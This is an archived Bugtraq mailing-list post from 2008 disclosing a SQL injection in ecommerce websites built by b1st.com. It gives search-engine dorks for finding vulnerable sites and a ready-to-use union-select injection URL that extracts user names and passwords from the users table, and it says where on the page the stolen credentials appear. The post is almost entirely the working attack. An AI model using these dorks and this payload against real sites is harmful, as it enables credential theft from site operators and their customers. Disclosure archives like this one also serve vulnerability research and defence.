[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Ecommerce Websites from b1st.com SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ecommerce Websites from b1st.com SQL Injection
From: hackturkiye.hackturkiye@xxxxxxxxx
Date: 15 Feb 2008 19:09:08 -0000

#########################################################################
# 
#   Ecommerce Websites from b1st.com SQL Injection
#
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.hackturkiye.com
#
# MA&#304;L : hackturkiye.hackturkiye@xxxxxxxxx
#
#########################################################################
# 
#  DORK 1 : "Ecommerce Websites from b1st.com" 
# 
#  DORK 2 : allinurl:
#
#########################################################################
   
EXPLO&#304;T WORK&#304;NG ON HTML S&#304;TES 

LOOK Combo Deals UNDER PAGE YOU W&#304;LL SEE ALL USERS USERNAME AND PASSWORD

#########################################################################
EXPLOIT : 

index.php?option=newspecial&category_id=-1/**/union/**/select/**/0,concat(name,0x3a,pwd),2,3,4,5,6,7,8/**/from/**/users/*
  

#########################################################################
# S@BUN       i AM NOT HACKER      S@BUN 
#########################################################################

Prev by Date: joomla "com_smslist" sql injecton
Next by Date: Re: [Full-disclosure] rPSA-2008-0052-1 kernel
Previous by thread: joomla "com_smslist" sql injecton
Next by thread: [ GLSA 200802-08 ] Boost: Denial of Service
Index(es):
- Date
- Thread